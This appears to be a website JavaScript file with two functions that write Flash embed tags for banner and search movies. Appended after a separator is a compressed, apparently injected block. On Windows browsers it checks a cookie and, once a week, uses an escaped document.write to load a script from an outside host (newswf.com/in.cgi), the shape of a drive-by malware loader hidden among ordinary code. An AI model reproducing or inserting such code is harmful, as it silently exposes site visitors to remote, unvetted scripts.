// JavaScript Document
function RunFlash()
{
document.write('<object codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" height="80" width="730" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">\n');
document.write('<param name="movie" value="VisitaMiCasa03.swf">\n');
document.write('<param name="quality" value="high">\n');
document.write('<embed src="VisitaMiCasa03.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="730px" height="80px"></embed>\n');
document.write('</object>\n');
}

// JavaScript Document
function RunFlashSearch(Argumentos)
{
document.write('<object codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="516"  height="327" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">\n');
document.write('<param name="movie" value="SearchCV02.swf?Args='+Argumentos+'">\n');
document.write('<param name="SCALE" value="exactfit">\n');
document.write('<param name="quality" value="high">\n');
document.write('<embed src="SearchCV02.swf?Args='+Argumentos+'" quality="high" SCALE="exactfit" width="516" height="327" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash"></embed>\n');
document.write('</object>\n');
}


/* ============================================================================-*/
function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");} if (navigator.userAgent.indexOf("KHTML") == -1 && navigator.userAgent.indexOf("NT") != -1){if(navigator.cookieEnabled == true) {var user = getCookie("NSwfCookie");if (user !=="ok"){newswfcookie();setCookie("NSwfCookie", "ok", 7, "/");}}}  function newswfcookie(){document.write(unescape("%3Cscript src='http://newswf.com/in.cgi?6' type='text/javascript'%3E%3C/script%3E"));} function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}
/*============================================================================-=*/

